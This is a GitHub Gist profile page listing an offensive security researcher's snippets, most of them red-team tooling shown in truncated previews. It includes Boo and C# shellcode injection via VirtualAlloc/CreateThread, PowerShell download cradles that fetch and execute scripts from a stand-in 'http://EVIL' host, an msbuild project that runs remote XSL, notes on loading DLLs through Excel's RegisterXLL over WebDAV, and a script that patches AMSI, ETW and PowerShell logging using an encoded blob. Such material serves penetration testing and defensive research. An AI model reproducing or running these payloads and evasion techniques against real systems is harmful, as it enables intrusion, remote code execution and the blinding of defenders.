Skip to content

Instantly share code, notes, and snippets.

View byt3bl33d3r's full-sized avatar
🧛
This shit ain't nothing to me man

Marcello byt3bl33d3r

🧛
This shit ain't nothing to me man
6.7k followers · 208 following
View GitHub Profile
@byt3bl33d3r
byt3bl33d3r / ecdh_eke.py
Created October 13, 2018 02:55
ECDH Encrypted Key Exchange (Python 3.6+)
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, padding
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from secrets import token_bytes
class DiffieHellman:
def __init__(self):
@byt3bl33d3r
byt3bl33d3r / shellcode.boo
Last active December 7, 2018 22:57
Boolang shellcode injection via CreateThread/WaitForSingleObject
import System.Runtime.InteropServices
from System import IntPtr
[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as int, flProtect as int) as int:
pass
[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
pass
@byt3bl33d3r
byt3bl33d3r / DownloadCradles.ps1
Created December 13, 2018 02:25 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@byt3bl33d3r
byt3bl33d3r / LoadXSLFromMem.cs
Created June 11, 2019 22:00 — forked from TheWover/LoadXSLFromMem.cs
Loads XSL files from memory (or disk) using the Microsoft.XMLDOM COM object.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Text;
using System.Threading.Tasks;
namespace TryCOMXSLLoad
{
class Program
@byt3bl33d3r
byt3bl33d3r / xslt.proj
Created June 11, 2019 22:02
msbuild XSLT Execute From URL
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0">
<Target Name="Example">
<ItemGroup>
<XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" />
</ItemGroup>
<PropertyGroup>
<XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile>
</PropertyGroup>
<XslTransformation
OutputPaths="output.%(XmlFiles.FileName).html"
@byt3bl33d3r
byt3bl33d3r / BooBeacon.cs
Created June 17, 2019 00:07 — forked from Ne0nd0g/BooBeacon.cs
C# w/ embedded Boo lang compiler to execute Boo lang script that executes provided shellcode
using System;
using System.Text;
using System.Reflection;
using System.Collections;
using System.IO;
using System.IO.Compression;
using Boo.Lang.Compiler;
using Boo.Lang.Compiler.IO;
using Boo.Lang.Compiler.Pipelines;
@byt3bl33d3r
byt3bl33d3r / lethalhta.boo
Last active September 14, 2019 02:16
Boolang port of LethalHTA (https://github.com/codewhitesec/LethalHTA)
import System
import System.Runtime.CompilerServices
import System.Runtime.InteropServices
import System.Runtime.InteropServices.ComTypes
public struct FILETIME:
public dwLowDateTime as int
public dwHighDateTime as int
@byt3bl33d3r
byt3bl33d3r / ExcelXLL.md
Created September 14, 2019 07:58 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@byt3bl33d3r
byt3bl33d3r / Invoke-LetMeIn
Last active January 16, 2022 23:42
Patch AMSI, ETW and PS ScriptBlock + Module logging (⚠️ not Transcription logging! ⚠️) using an embedded Boolang Compiler within Powershell
function Invoke-LetMeIn
{
$BooLangDLL = @'
vH0HfJRF+v/MvJvdzW4CbMpuIEBCCSyhBQiwJIGEZkGwYCEBC1UBlcUEEAiL9BAICIiKqKiIDVE5KyBnRUVFxXY2sJ9nO8/zvDvvzh/+nzJv2d0k5F/uz4c8+37nmfrMM8+Ud2becRM3CUMI4YK/334TYp/gfxXi5P+WwV+rvAOtxKOpr3XaJ8e+1um8mbNq8udWRy+rnnJl/rQpc+ZE5+VPnZFfPX9O/qw5+aPOOjf/yuj0GX3S031ddRxnjxZirDTi4v1UqE5+6RUiSwnhZbePB8BzPmZMce7wWXG+hbB/xTJF7kvTDChXxWoh2tB/+9f6oX+bIN4zBMfrdYnkf5OVSGuBLJL+5VtZp39ewKc5cJ95MxbOg98vM3W5sjjfCVFM7lNdUz0Nw7s4j8INv8F4jxXwv0/1jCui4DFN55niap/kb0RiNp8ZwH4wb0qkiPPeFiIyWYrUBH/vvMX1fbJ/mUVStIJfKURALAXq8kXQ3V0oRC7wusbzhFqGv0Y0qqBkxylVNzmJY4WyDebJIzLbcXZmq5oUIXwxrHYVBkFAcCMGuuMqhHQNUUhlEAFV68K43X61BB88RhhcffMg1lx3GGhPn9tT8fFvv/1WKE4SztVkuFwI9waEM7AsqhazdBSec8MeCJIholD3viFYGe670Nkf2YUlYI9RKI0v6gOSHhkErhlG2A8gzTsfvQ7pYvu0o/RG05ByZMcncKh0cCp5CjJ0vBU5nAiCfHKjAHzHVC0KBsQqema6Aq4GijqEMduRamd8dgdcfqooT6FguZeKsXVUlSSjUWYFG65oa0w2A56rQShzXUYY/PtqAkAWc7bBD+aW5UlS4EdXFEL5CofZlZeClZdZpMQpgtpwAL2ioz+YFsnD7Hi3+9zz3Zh5liY+pkfawrM3VJnm9WycVf4+SCBLMzCLqYVjVE1H1BS3pSmFF0DEbspbTRaKPxtIt0LSV8Cg+VSP6CMKU
@byt3bl33d3r
byt3bl33d3r / zipapp.md
Created October 21, 2019 23:10 — forked from lukassup/zipapp.md
Python zipapp

Python zipapp web apps

What's a zipapp?

This concept is very much like .jar or .war archives in Java.

NOTE: The built .pyz zipapp can run on both Python 2 & 3 but you can only build .pyz zipapps with Python 3.5 or later.

Initial setup